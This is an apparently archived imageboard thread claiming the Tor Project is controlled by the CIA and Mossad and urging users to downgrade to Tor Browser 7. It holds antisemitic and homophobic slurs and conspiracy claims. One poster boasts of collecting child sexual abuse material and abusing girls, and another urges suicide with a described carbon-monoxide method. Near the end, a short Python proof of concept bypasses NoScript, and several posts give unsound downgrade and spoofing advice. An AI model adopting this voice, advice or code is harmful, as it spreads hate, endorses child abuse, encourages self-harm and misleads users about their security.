TOR PROJECT = CIA, MOSSAD

DO NOT DOWNLOAD TORBROWSER 8.x or FF 6X
they have huge amount of zero-days. THEY ARE COMPROMISED

PROOF: darknetlive.com/post/zero-day-company-reveals-vulnerability-in-tor-browser-7-x/
>In a post on Twitter, a company specializing in purchasing zero-day exploits from researchers and selling them to government agencies revealed that several versions of the Tor Browser fail to prevent JavaScript from running even with NoScript on the most secure setting.
A company that earns profit on selling exploits for tor browser is telling you that tbb 7.X in UNSAFE and you need to migrate to SAFE tbb 8. does that sound legit? what is their motivation? how do you think?
if TBB 7 is so insecure, why would they speak about it publicly instead of selling zero-days for it?
the true reason is, because they have a lot of zero-days for TBB8, whereas TBB7 is mature and they won't be able to find much more holes.
THEY ARE A PRIVATE COMPANY that is "specializing in purchasing zero-day exploits from researchers and selling them to government agencies". Your security is not in their interests, their interests is making profit by selling zero-days. If they shill for updating TBB to version 8, that means they will profit from it. How? By selling zero-days for TBB8. They have a lot of them.
The exploit is not in browser code but in NoScript. NoScript creators quickly released a fix. You can get it here: noscript.net/getit you need the 5.1.9 version for TBB7 and FF ESR

Other urls found in this thread:

ibtimes.co.uk/leaked-tor-project-chat-logs-reveal-it-struggled-over-hiring-ex-cia-agent-1567591
pastebin.com/WPAmqkW8
bvass.wordpress.com/tag/nsa/
twitter.com/torproject/status/898256109789687808
gitweb.torproject.org/tor-browser.git/tree/toolkit/components/resistfingerprinting/nsRFPService.h
trac.torproject.org/projects/tor/ticket/26146
web.archive.org/web/20180913020822/https://dist.torproject.org/torbrowser/7.5.6/
ssllabs.com/ssltest/viewMyClient.html
archive.torproject.org/tor-package-archive/torbrowser/
trac.torproject.org/projects/tor/ticket/27495
whonix.org
lwn.net/Articles/676613/)
developer.arm.com/technologies/trustzone
en.wikipedia.org/wiki/ARM_architecture#Security_extensions
zdnet.com/article/exploit-vendor-drops-tor-browser-zero-day-on-twitter/]
techblog.willshouse.com/2012/01/03/most-common-user-agents/
twitter.com/NSFWRedditImage

Attached: 89d51190d720e5b206b04da91288d9c83f4fcb79dcd62cf592af172e239ae0aa.jpg (500x500, 37.38K)

3 minutes passed and CIA is present in thread

In what possible method of your crackpot thinking, did you somehow conclude that Tor is compromised by CIA/Mossad?

No, seriously, tell me.

When you hear or read something, look at who is saying that and what is his true motivation. What he wants to achieve with it. What are his hidden motives.

Facts:

Zerodium = Private company that earns money on selling Tor Browser zero-days to governments

So Zerodium has zero motivation to help people avoid zero-days, it has opposite motivation, to trap people into zero-days and sell those to governments.
That means, when Zerodium tells you to do X, that means X will fuck you up. In this case X = "Update your Tor Browser and Firefox goyim!"

When Zerodium tells you "goyim Tor Browser 7 is insecure" and "goyim Tor Browser 8 is TOTALLY secure and safe", it's actually opposite. TBB7 is safe and they don't have exploits for it, but they have huge amount of exploits for TBB8.

Their only point of existence is making profits for their shareholders, making profits by selling zero-days to governments.

We need to downgrade to Tor Browser 7

...

I'm shocked.

Attached: 97a67bf235dcc5f387d014655806787059f603f4e2e95ea792aeadd242470144.jpg (1000x1600, 374.1K)

Tor is making many changes that lower anonymity and security of Tor users. Some time ago they also kicked off one guy on false rape accusations.
Why CIA? Because Tor Project is based in US. Why Mossad? Because jews and Mossad own US and CIA. Americans are cucks that do everything what israel tells them. Israel even told americans to destroy their children's penis foreskins and americans complied with that.


NoScript allows you to occasionally enable javascript on a website
but if you don't do that then yes, turning it off in about:config could be much safer


jews and SJWs infiltrated Tor Project long time ago

also, the bug was in NoScript, not in TBB7 itself. why zeriodum shills told people to update TBB instead of just updating NoScript?
if you have a hole in your tire, you should change your tire, not your car. but Zeriodum told people to change a car

>there are people in this very thread that updowngraded to 2GB-startup-memory TBB 8.x
lmaoing @ u

there is a theory that, not many people "upgraded" to Tor Browser 8 / Firefox ESR 60, so (((they))) ordered (((Zerodium))) to publish that recommendation and muh exploit

Tor Browser 8 / Firefox ESR 60 = bloat, a lot of new code, huge potential attack surface.
Stay away from it, let goyim test it and be lab rats

Well pictures like related are dead give aways of (((their))) influence on tor. Firefox ESR 52 is also botnet because of CSS3. Get on palemoon 27 you faggots as it uses the firefox 27 codebase, which was clean, but with security and effiency optimizations.

🇺🇸 = 🇮🇱

Why doesn't Tor disable exploitscript in their fagfox build? Surely there's a flag for that.

There's not a build time flag for that because the javascript code is intertwined with the layout engine/displayer. Unless you recode that entirely like they are in rust you can't just rip out javascript. Even then you can't just rip out javascript since webextensions need it to run. Even then you can't because the auto updater and the firefox sync requires it to run. And even then there's probably more shit I am unaware of that requires it, all of which would mean heavy source code editing or going back to a earlier version of firefox where this shit wasn't so intertwined as to be botnet.

why not use a webbrowser like Lynx

They are compromised and went shit since Applebaum was made to leave because muh sex harrasment, rape and whatever.

supporter=/=dev

They accepted the sad reality of javascript-riddled internets, therefore devalued their browser suite.

Another point for umatrix.

implying the previous 3 releases weren't shit too, just as this user said
The only problem is that palemoon cannot be trusted.

fingerprint

Check the exploits, how they work and you'll realize why they're fixed now.

[Citation needed]

Why don't you tell us? Check the exploit ans why it works in TBB7 but not 8.

That's the problem with pol crossposters: you don't understand or care about tech. You just read some bullshit about sjw in a project and decided to come here and spread your bullshit. Either back up your claims or go back to your shitty board.

Because most users want or need JS for whatever reason. NoScript also has more security features than just JS blocking: like preventing cross-site scripting, clickjacking, etcetera.

Doesn't just turning off JS already make you different than most other traffic?

By the blinding glow in your post.

It's hard to believe this house of cards is safer than something like Lynx. First off the browser itself is a bloated shit that's trying to compete with systemd to see who can win the special olypics of code-shitting. Then you have JS, literally a remote code execution facility. And on top of all that shit you're running various scripts and add-ons, because obviously that functionality is too massive to have fit in Firefox itself (instead they give you "features" like making it harder and harder for the user to configure his browser every new release).

is a Fingerprint with X% more uniqueness not a good trade off for the lowered attack surface?

lowered attack surface of botnet is still botnet

wich are the conditions for a Webpageddisplay Programm to be considered non "Botnet"?

Here's a short list of what's wrong with the Tor Project
- A person at the Tor Project hired (or wanted to hire) a (former) CIA person without notifying it's fellow Tor Project employees[1][2]
- Shari Steele's husband Bill Vass worked for the NSA[3] and now works for Amazon Web Services
- Rob Thomas a Rabbi is listed as a Tor Project team member (red flags for me!)
- They don't mind child porn, drugs, murderers for hire, but White Nationalism (fuck the DailyStormer though) has to be officially and publicly denounced[4].
- It has been infiltrated by SJWs

Here's a short list of what's wrong with Tor Browser
- Javascript is enabled by default
- Javascript is re-enabled each time you restart the browser
- They let user be fingerprinted because "it breaks some MAC OS keyboard shortcuts" [5][6]

[1]: ibtimes.co.uk/leaked-tor-project-chat-logs-reveal-it-struggled-over-hiring-ex-cia-agent-1567591
[2]: pastebin.com/WPAmqkW8
[3]: bvass.wordpress.com/tag/nsa/
[4]: twitter.com/torproject/status/898256109789687808
[5]: gitweb.torproject.org/tor-browser.git/tree/toolkit/components/resistfingerprinting/nsRFPService.h
[6]: trac.torproject.org/projects/tor/ticket/26146

I'm still using it because it gives me a false sense of security. And no alternatives, really

And Government funding of course.

Good job retard

Attached: IMG_20181223_234827.jpg (570x466, 58.05K)

Not to mention disabling JS on clearnet sites itself is a huge fingerprint

Lynx cannot be used to browse most of the web, Tor Browser can.
Which is necessary for most websites to work.
Tor Browser only runs NoScript and HTTPS Everywhere. The functionality of those two addons could be mainlined to Firefox but a. You'd be bitching about "bloat" and b. It's not a feature most users want.
XUL addons had to go both for security and to rewrite Firefox.

Attached: balance-is-the-key-of-life.jpg (600x366, 29.75K)

fyi, @isislovecruft (my colleague & one of core tor developers) is cia.

[citation needed]
She has a nice pinned Tweet though:
x="if(t%2)else";python3 -c"[print(t>>15&(t>>(2$x 4))%(3+(t>>(8$x 11))%4)+(t>>10)|42&t>>7&t

lel XD just use tor browser!!

Well just the fact that people want to browse websites that require JS means they don't care at all about security. All you've done with those add-ons is pile on some mitigations. You're not willing to actually make any sacrifices, so you play this security theatre game where you address the symptoms, but never solve the problem. You've been playing this "add-on of the week" game for how many years now? But the fundamental problems are still there, and getting worse. You've solved nothing, but what you have done is give those shitty JS websites more validation to exist, and you've become dependent on them. But that's by your own choice. Nobody can force you to use those sites, just like they can't force you to run Windows, systemd, or have Intel botnet computer.

Not the same guy you're responding to but I'd love to use something as simple as Lynx but my main concern with that is fingerprintability.

...

Here's the thing the idea behind Tor is not to spam Wojak pictures in social media, nor is it to read the latest Qanon post; it is to conceal the user's identity from third parties but most importantly from the ISP and the government.

Some Mexican reporter may need to share delicate information about a drug cartel and in that case it doesn't matter if Google can slurp the metadata of the photos they're sending through Gmail to their colleagues, what matters is that some corrupt ISP or government official can't snoop it. Maybe a Chinese citizen wants to post on a forum against the Party. Maybe a bunch of Venezuelans need to go into a page that is blocked by the ISP or maybe they fear they may be in some sort of list just by browsing a couple of websites.

Yes, they could technically buy computers and put up a webserver with custom email and forums and a end-to-end encrypted XMPP chat and shit, but that's not inside the scope of most of the people and that's not the point of Tor. Tor also can't protect users who go to non-https websites (which is why they include HTTPS Everywhere, as it's the only extension of it's kind to block HTTP and mixed requests) the government and ISPs can see the user is connecting to the Tor Network which is why they spend so much time with OBS and new bridge protocols.

And for what it is, Tor works fucking great. All the alphabet agencies' leaked documents have shown thus far that they have trouble breaking Tor. Everytime a big sting happens and the feds take down drug websites or pedophiles who use Tor is thanks to human error and OS-level exploits.

Would I prefer the web if it was almost entirely HTML/CSS, webapps didn't exist and JS was only sparcely used for fancy visual effects and/or when it's really necessary? Yes, I would. Then again it's not possible to change stuff right now so mitigations are the only possible course of action.

Tor encourages users to disable JS, most multimedia features, plugins, extensions and to never download any content while using Tor, for what is worth.

Attached: 6c5.gif (450x253, 1.37M)

They actively discourage users to do that by re-enabling Javascript each time the browser restarts. It's incredibly annoying.

I'm a bit slow to realize it but yes, OP, it's incredibly fishy when a private corporation (Zerodium) that sells Zero Day exploits to Government agencies is telling people to move away from an allegedly insecure browser and upgrade. I might consider down-grading with some patches to prevent fingerprintability ...

web.archive.org/web/20180913020822/https://dist.torproject.org/torbrowser/7.5.6/

????
I just tested it and it retains my settings between restarts. Why are you lying on the internet?

Attached: Screenshot_20181224_173357.png (528x351, 30.56K)

Bummer 7.5.6 does not support TLSv1.3 so you cannot imitate Tor Browser 8+ ... would using WaterFox + Tor Browser 7 patches be a good idea?

If you have to ask, then no.

Probably my mistake then...

Change "security.tls.version.max" to "4" and you'll have TLSv1.3 support

Anyway using tor with your wired home IP is just suicide. kill-grid beacon UUID system + NORA and NAMESDB = your death.
If you're not stupid you'd go on a densely populated area and use wireless modems + several kilometers wifi to obfuscate your location real location and of course you should conceal that antenna too.

Imitating Tor Browser 8 with Tor Browser 7.5.6
security.ssl.disable_session_identifiers = false
security.enable_tls_session_tickets = true
general.useragent.override = "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
security.ssl3.dhe_rsa_aes_128_sha = false
security.ssl3.dhe_rsa_aes_256_sha = false
security.ssl3.ecdhe_ecdsa_aes_128_sha = false
security.ssl3.ecdhe_ecdsa_aes_256_sha = false

Download of 7.5.6 here:
web.archive.org/web/20180913020822/https://dist.torproject.org/torbrowser/7.5.6/

Not to forget:
app.update.enabled = false

And:
security.tls.version.max = 4

Nevermind, it's SSL is still distinguishable

TBB 8.5a5
TBB 7.5.6
ssllabs.com/ssltest/viewMyClient.html

Guess what retards? Go to china where there's like 50 black hats per square km. YOU go tell them about how your tor browser bundle is absolutely secure. They will laugh at you and then pity you. Ask any hacking company there, well guess what? They all have zero days to brag during hackathon or some promotion shit or competition. They know the ins and outs of this bloated pile of code called firefox and it would seem as if it's child's play to them. You guys are just unaware of how bad things are. If you really care about having a secure browser then make one yourself. It's pretty easy. You just all forget what hacking is all about. You let other very suspicious bunch do your programs then that's what you get for having the trust of a retard. Even kids instinctively know when to not take the candy.

square meter

This happened months ago. This isn't news. Also if you read the readme old release can be found here
archive.torproject.org/tor-package-archive/torbrowser/

No it isn't. At least using the security slider it isn't.

Couldn't you use css3 to distinguish between the two? Certain features in firefox 60 aren't in firefox 52.

Yes. Browsers are truly shit the W3C, Google, Mozilla, [some web-related organization] is constantly spewing out new web techonologies and for little gain, so it's almost impossible to fork a project and not be fingerprintable
That was my mistake, I used the NoScript GUI to disable Javascript globally (now I'm just using uBlock Origin to block Javascript)
Thanks.


It isn't easy to create a modern web-compatible browser though it is very easy to simply download everything you want and browse it offline in whatever shitty browser you choose. I think that's the best way.
Yes. And not just in technology ...

≠TOR
Most of us use TUI wo/Javashit


Jacob Appelbaum was harassed by SJW Twitter, not TOR devs. George Soros to blame here, maybe CIA, but def. George.

This is true.

This

You'd be surprised what some Linux devs are into.
ROFL

They shared it after the newest version was released because it has no value to them now. They want to show off their inventory by sharing something that worked all the way until the next version. Saying 8.0 is no longer affected means "If you didn't know it yet, it has no value to you now." Why would they want to share a working exploit with their competitors?

Also, useragent is nothing. There are like three operating systems. So what if one mass becomes three masses.

Plus, that was a quick advisory. "The noscript plugin is buggy" isn't as dramatic as saying the whole package is flawed. It's also easier to communicate since there's a new browser out and the problem is fixed, just upgrade the whole thing and be done with it, consumer.

Plus also, alphanumeric agencies use the network to communicate overseas. They may control and analyze the network but idk why they would compromise their own communication tool in a serious way. Maybe it's a it's broken and everyone knows it's broken, so lets not fool ourselves into thinking changing the user agent is going to make things more secure, kind of compromise.


Even my out of commission toaster has 8 GB, what kind of ancient technology are you running?

Your toaster is probably botnet. ARM dev boards without blobs, x86 bugs and management type shit, or speculative disorders typically have 1 or 2 GB. That's enough to run Firefox, but why waste the memory. Even after running Links2 in graphics mode all day long on sites with lots of and/or large images, the footprint is only about 150 MB.

Attached: A20-OLinuXino-FRONT.jpg (540x289, 93.03K)

Everyone who disagrees with me is CIA
8ch is compromised. Leave while you can.

Who the hell relies on noscript to block javascript in tor? Just set javascript.enable to 0.

They threw him under the bus regardless, like leftists always do. They never have the balls to say no to some "oppressed" "minority".

Since all those retards have JS on all the time turning it off is going to make you stick out. If you turn it on to blend in with the rest of the retards you're risking being compromised by a JS exploit. If I have to pick one I'm going to pick the former, since JS exploits are likely what were used in all or near all deanonymization attacks on Tor.

>Well pictures like related are dead give aways of (((their))) influence on tor. Firefox ESR 52 is also botnet because of CSS3. Get on palemoon 27 you faggots as it uses the firefox 27 codebase, which was clean, but with security and effiency optimizations.
The problem is you cannot just use another browser with Tor. If you configure normal browser to use socks proxy and set it to Tor, you won't have this:
-your browser won't have stream separation as in Tor Browser
-your browser will behave differently, will send different headers, you will stand out
-your browser won't have other security and privacy tweaks that Tor Browser has
That's why we are forced to use Tor Browser


see above
it would only work if we made a fork of Lynx, implement some Tor Browser features into it, then convince several thousands of people to use that browser


I am heavy javascript hater but I kind of support their decision to have javascript on by default
it will make more normies and people use Tor Browser. more Tor Browser users = easier to hide
advanced users will disable javascript


trac.torproject.org/projects/tor/ticket/27495
they removed useragent spoofing

zerodium shills for TBB8 because it has hundreds of exploits, they can sell them
the exploit they found was fixed in NoScript update. TBB7 users only need to update NoScript


you are right. from security point of view, Lynx is better. But from privacy point of view, Tor Browser is better because it has more users and anti-fingerprint measures.


I don't think that's true, unless you use Tails

the Daily Stormer statement was big and they promoted it everywhere.
I never heard Tor Project saying anything about pedo users and I am a pedo myself and CP collector.

Total bullshit.
In those countries if you use Tor they will put you to jail and torture.
Also, if Tor was really about those reporters in 3rd world countries, THEY WOULD NOT DROP SUPPORT FOR WINDOWS XP & 2000. People in 3rd world countries use old operating systems like XP, not some newest botnet Win10.
The Tor exists so white people in first world countries can watch and distribute CP, also to make political parties being able to spam and shill in easier way.

It does protect them, it hides user location.

Yes, it works great for CP. I have terabytes of it. I love CP.

how do you know if they were leaked or "leaked" (false flag)?


THAT'S THE POINT
I can't understand why nobody else realized how fishy it is


maybe he uses Tails. Tails is a honeypot and it's insecure. use Whonix instead of Tails. whonix.org but remember to encrypt your entire PC or whonix VM.


you don't need to imitate Tor Browser 8. There is still plenty of TBB7 users.


This should work well without javascript. But I am afraid if someone enables javascript tbb8 won't be imitated
but we dont have to imitate TBB8. if there is still plenty of people that use TBB7.

That's not correct because many people disabled autoupdating in Tor Browser. Also some people who updated to TBB8, when they saw how shit and bloated it is, they reverted to TBB7. So (((they))) had to do something to push people into TBB8 trap.

They released this exploit in order to force people to "upgrade" to TBB8, in order to sell even more exploits. TBB8 is huge amount of new code, huge new attack surface to find exploits.

That's very wrong. Tor Browser userbase is small. They shouldn't make it easier to fingerprint.

So you agree that they lied. If they lied, we cannot trust them with anything they said.

What bullshit are you speaking?
There is also new NoScript version and it's even easier to update because you only need to download small .xpi and you don't even need to restart web browser to update it.

it's not a problem if only they know about those exploits.
Also, CIA doesn't use Tor Browser. They use Tor with other browser. Because CIA only needs to hide from local ISP that they connect to CIA network, they don't need anti-fingerprint measures. When they login into CIA network, the CIA network knows who they are anyway.


ARM is a botnet.


you won't be able to temporary enable javascript for one site if you do that.

do it OP

Attached: Clipboard.jpg (1300x1689, 495.12K)

Attached: Capture.JPG (871x31, 11.92K)

if that's legit then Tor = CIA
but first you should check if maybe some addons modify that setting, not browser. maybe NoScript does that?

set javascript to disabled, close tor browser, then start it in safe mode, without any extensions turned on (except tor launcher, tor button). so disabled noscript, httpseverywhere etc
and see if browser still switches your javascript

Have you thought about taking a break from Tor and going with a basic VPN setup for a few months? You have clearly lost the plot and I would be concerned if I didn't think you were larping. What's fishy is how you're shilling TBB7 with an unsigned NoScript patch and only gave hashes for the bundle. Did you pull a mint linux (lwn.net/Articles/676613/) and compromise the NoScript site?


- multiple tor instances for separation
- local proxy to fix headers and make it look like tbb
- use a simpler browser, less behaviour, no javascript. it's just HTTP 1.0 in the end.
>That's why (((we))) are forced to use Tor Browser

You know nobody around here says 'normies' unironically, right? Maybe you should add that fact to your shill wiki.

Proofs or gtfo. Also what hardware and OS are you running?

I don't even want to know.
I'm not sure what the international jew or Freemason uses for its communications. I guess if they used something other than Tor they'd stand out, but then again many are I think simply using Gmail (like John Podesta).


>==(((Yes, it works great for CP. I have terabytes of it. I love CP.)))==
I'm obliged to ask you to kill yourself. Just turn on the BBQ in a air-tight room wait 30 minutes or so enter the room and die of monoxide poisoning, it isn't painful and I highly recommend it.


Yes, I have. I think it's best to download the websites I need and browse shit offline anyway, this low-latency internet is wasting my time and very unproductive.

Can you explain this? What is "kill-grid beacon UUID system + NORA and NAMESDB"?

What is TUI?

Appelbaum was a spokesperson and developer of Tor (browser bundle?). It's clearly another harassment/rape card same thing they played against Assange.

Terminal user interface

ISP
or fake ISP
either way, they're the same.
SAT/RF anything goes.
Kill-grid and botnet everywhere!
It's like botnet but can phone to the source by itself. There's lots of them right now, people are just unaware and they better be :)

Someone who gets paid for selling exploits won't make any money if all needed exploits are already known.

...

Actually this brings up an idea. A exploit salesman could figure out the known unknown's i.e the exploits someone is aware of. All you have to do is try selling the exploit to someone such as the gchq and see if they want it/already have it based on how the sale is responded to.

Then you use that information to protect yourself and others from exploits others don't or do have.

If we're judging people based solely from financial motive, then it's more likely that previous tor browser exploits are well known so they're pushing for a browser with at least less well-known exploits.

Regardless,conspiracy arguments can conclude anything. Evidence is especially needed here.

Why would I?
VPN is inferior to Tor in every aspect. VPNs are honeypots. They are shilled by VPN companies.
VPN can only protect you from showing your IP to people on IRC, or hide from your ISP that you are downloading torrent. That's all they do and you need to pay for that shit.

?

NoScript did not give hashes. But we can post ours and compare.

that's stupid.
I meant different separation. This is how TorBrowser works:
1. You open 8ch.net in a tab. it connects to 8ch and other servers (images, ads, shits) using CIRCUIT_A
2. You open nigger.com in other tab. it connect to site and included stuff (images ads etc) using CIRCUIT_B
even if 8ch and nigger.com includes stuff from one server for example google.com, you will connect to google.com using separate circuits.
but if you instead use a web browser like Lynx (with Tor) it will use different circuit for every different hostname, but same circuit for same hostname if multible tabs are using it. so google.com or facebook could track you and link all your tabs to one person

and if you use multiple tor instances for every application that you use, that's very very bad, because you will be connected to multiple entry nodes and correlation attacks will be several times easier, than if you used single entry node for a lot of stuff (every application)

I know this because I work at Tor Project.

but your browser doesn't work with 80% sites.


developer.arm.com/technologies/trustzone
en.wikipedia.org/wiki/ARM_architecture#Security_extensions

>Also what hardware and OS are you running?
Pre-ME, Pre-PSP, Pre-UEFI.
non-botnet OS
cannot tell more because it could be used to identify me


Just reported this post to feds. Encouraging suicide is illegal and punishable by law. You better use 7 Tor's.
I won't kill myself and I will continue to have fun with little girls.

When working on different projects, be it computer related or not, it's often necessary or useful to use internet to research something or find solution for a problem.


this
and even if he raped or harassent someone, who cares? He was good workmate, I liked him. The whole rape thing is a joke, many women even like rape but they won't admit it openly


that's shit. go back to your commodore shit
terminal user interface is unproductive


can you provide some proofs or citations?


Tor Browser 7 exploits are known and fixed, as it received many bug fixes. Tor Browser 8 contains big amount of new code, that will result in many new exploits.

FUCK FUCL WHAT THE HELL

could you explain? what about airplane mode?

[attached: man_grinning_with_eyes_closed.jpg]
when you invent an anonymitiy tool and your co-creator uses it to post apathy towards an alleged rape in your company and you cant fire (him?) because they used your tool

...

OP is a faggot. even for a troll this is tl;dr
>In an interview with ZDNet, Giorgio Maone, the author of the NoScript extension, said the zero-day was caused by a workaround for NoScript blocking the Tor Browser's in-browser JSON viewer. [zdnet.com/article/exploit-vendor-drops-tor-browser-zero-day-on-twitter/]
when your stupid blocker addon conflicts with internals of the web browser, you stop there, you don't work around. but yeah whatever enjoy your resultant vulns. also it sounds like the addon API is trash (most are). you should all kill yourselves for using a plugin (which is bloated as fuck and does far more than disabling JS on a per-site basis (for example XSS filtering)) to disable JS. literally just go to about:config and set javascript.enabled to 0. you can make a separate profile in firecox for accessing pages that require JS

What a clusterfuck. Morons are easily impressed by complexity. All the modern web and Tor shit is their pigpen.

Monkey-fixed. This exploit bypass NoScript 5.1.9.

#!/usr/bin/pythonfrom BaseHTTPServer import BaseHTTPRequestHandler,HTTPServerPORT_NUMBER = 31337class myHandler(BaseHTTPRequestHandler): #Handler for the GET requests def do_GET(self): self.send_response(200) self.send_header('Content-type','text/json;') # Here is where the magic happens self.send_header('Content-type','text/html;') # Here is where the magic happens self.end_headers() self.wfile.write("Tor Browser 7.x PoCalert('NoScript bypass')") returntry: server = HTTPServer(('', PORT_NUMBER), myHandler) print 'Started httpserver on port ' , PORT_NUMBER server.serve_forever()except KeyboardInterrupt: print '^C received, shutting down the web server' server.socket.close()

Why did Zerodium expose Tor 7.x's vulnerability? It's simple. It's no longer valuable information. Many people already updated their Tor Browser to 8.x so only a few people use Tor 7.x.

can someone upload prefs.js file from Tor Browser 8?
so can compare between 7 and 8 version.

can someone post what headers does Tor Browser 8 send when it's doing requests?

I suggest this:
Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
because it's more popular.
techblog.willshouse.com/2012/01/03/most-common-user-agents/
linux version has 0.9% share compared to 0.5% with Win7


any idea to fix that?


even without Javascript?


how to run this shit to confirm?

Install uBlock Origin or uMatrix, disable JavaScript by default on those and enable it on trusted sites.
NoScript was proven to be shit time and time again. Tor devs are morons for keeping it.

which ones? It's still supported by any Linux distro, windows 7+ and android. Pretty sure any BSD can run it fine. Nothing else is relevant.

It doesn't lower your privacy at all. Spoofed user agents aren't even useful since your OS can easily be detected. Nobody can know your physical location, your IP or your identity simply by knowing your OS. The only thing this affects is automated malware which uses specific OS attacks. So I guess Linux and Mac are at a loss here.
I'm pretty sure they only show if you're running Linux, android, windows or Mac, and reveal if it's 32/64 bit. Your specific distro or OS version is hidden (afaik, can't confirm now).


Yes. CSS is powerful enough for fingerprinting without the use of js.

Why sites use js useragent and break MAC OS keyboard shortcuts instead easy OS detection?

Cite then.

Lynx is working pretty fine here

Exactly. And TOR devs really don't care about your history, so long the code is good.

When did styling a webpage go so wrong?

You argue like a fucking kike, user.

imagine being so brain-diseased that you think a branch of the useless US government is a bigger spying threat to you, a statistic, than capitalism

just an average day on Zig Forums

Attached: vindicated-dale-nsa.jpg (500x367, 54.71K)

Can someone open TBB8 and post those values from about:config?

general.appversion.override
general.oscpu.override
general.platform.override
general.useragent.appName
general.appname.override
general.useragent.override
general.useragent.vendor
general.useragent.vendorSub

or even better, upload your prefs.js file

man losing your foreskin really made some of you americucks soft in the head. Nice thread!

Can't you just disable javascript straight up? Every hidden service designed to be accessed via Tor shouldn't have JS to begin with.

They didn't say TB8 is totally safe, retard. They said the exploit wasn't applicable to TB8. Also, spoofing of user agent does nothing. NOTHING. You can employ better techniques against someone with Javascript enabled. You can fingerprint their fucking canvas and the shitty graphics libraries will give your personal info away.

Basically JS is the root cause of all security problems. You're automatically running untrusted code you got from the network. It's completely different from the class of problems where some crafty fuck exploits a badly coded XML parser and gains access to places he shouldn't have access to.